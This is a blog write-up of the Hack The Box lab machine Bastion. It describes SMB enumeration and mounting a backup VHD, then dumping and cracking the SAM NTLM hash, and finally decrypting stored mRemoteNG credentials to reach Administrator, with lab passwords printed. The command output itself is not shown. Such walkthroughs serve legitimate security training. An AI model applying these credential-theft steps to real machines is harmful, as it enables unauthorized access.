AdSense

Wednesday, July 31, 2019

Bastion


BASTION

 - Layout for this exercise:



1 - INTRODUCTION

 - The goal for this exercise is to develop a hacking process for the vulnerable machine Bastion from Hack The Box pentesting platform:

 https://www.hackthebox.eu/
2 - ENUMERATION

 - Bastion's IP is 10.10.10.134:


- Scanning with Nmap there are four open ports: 22, 135,139 and 445.


- Scanning deeper those four ports it seems that we have an SMB service running on port 445:


- This Nmap script enumerates the four shared folders:


- Connecting with smbclient:


- As expected, both ADMIN$ and C$ are not accessible:


- IPC$ seems accessible, but it does not yield any valuable information:


- However folder Backups gives us a lot of very important information about Bastion:




- Getting and reading note.txt it gives us a hint about backup related problems:


- Getting and reading SDT65CB.tmp it seems that the file is empty:





- Going into folder WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351:



- There are some .vhd and .xml files:



- VHD (Virtual Hard Disk) is a file format representing a virtual hard disk drive (HDD).

 - It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders. 

 - It is typically used as the hard disk of a virtual machine.

 https://en.wikipedia.org/wiki/VHD_(file_format)
- Getting the 1st .vhd file and applying command strings over it we find a lot of strings, but nothing that could lead to find any interesting hint for our purpose:

............................
3 - EXPLOITATION

 3.1 - Mounting the backup .vhd disk

- About the 2nd .vhd disk it is too large (5.4 GB) to check with strings, so it would be a better solution to mount it locally.

 - Installing cifs-utils:


- Creating folder /Backups:


- Mounting locally the shared folder /Backups:


- The mounting process is successful:


- Looking for the 2nd .vhd disk:



- The guestmount program can be used to mount virtual machine filesystems and other disk images on the host. 

 - It uses libguestfs for access to the guest filesystem, and FUSE (the "filesystem in userspace") to make it appear as a mountable device.

 http://libguestfs.org/guestmount.1.html


 - Installing libguestfs-tools:


- Creating folder /vhd2:


- Using guestmount to mount the 2nd .vhd disk on local folder /mnt/vhd2:


- The mounting process is successful, so now we have access to the whole backup disk .vhd2:





3.2 - Getting the Security Account Manager (SAM)

 - The Security Account Manager (SAM) is the database where Windows systems store users's passwords.

 - The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. 

 - Bastion is a Windows Server 2016 so it uses NTLM hashes for sure.

 - This file can be found in %SystemRoot%/System32/config/SAM and is mounted on HKLM/SAM:



- Using samdump2 to retrieve hashes from Bastion's users:










- Accounts Administrator and Guest are disabled, so let's write down hash for user L4mpje:

 26112010952d963c8dc4217daec986d9


3.3 - Cracking the NTLM hash

 - Hashkiller works online to decrypt the NTLM hash found in previous point:




3.4 - Getting a remote shell

 - Now, using credentials L4mpje:bureaulampje we have an SSH connection and a remote shell:










4 - CAPTURING THE 1st FLAG

 - Reading user.txt from user l4mpje's Desktop:



5 - PRIVILEGE ESCALATION

 - As expected Administrator's Desktop is not accessible, so we need some type of Privilege Escalation:



- Browsing around with the command line we check the presence of the  .vhd and .xml files found before:



- Going to L4mpje's home folder:



- However looking for hidden folders we discover a lot more available resources:



- Going inside AppData\Roaming there is a very interesting folder named mRemoteNG:







- Actually mRemoteNG is an open source remote control and connections manager:



- Reading confCons.xml we find encrypted credentials for Administrator:

- It happens that there are online available tools for dealing with mRemoteNG encrypted credentials, for instance the Python script named mremoteng_decrypt.py:





- Launching the script without parameters to explore available optional arguments:



- Applying the -s option, because the encrypted password seems to be encoded with base64 (see the final ==):


- So finally we have the Administrator's password: thXLHM96BeKL0ER2

- Connecting with SSH as Administrator we have a privileged remote shell:









6 - CAPTURING THE 2nd FLAG

 - Reading root.txt:







Posted by at
Labels:
Subscribe to: Posts (Atom)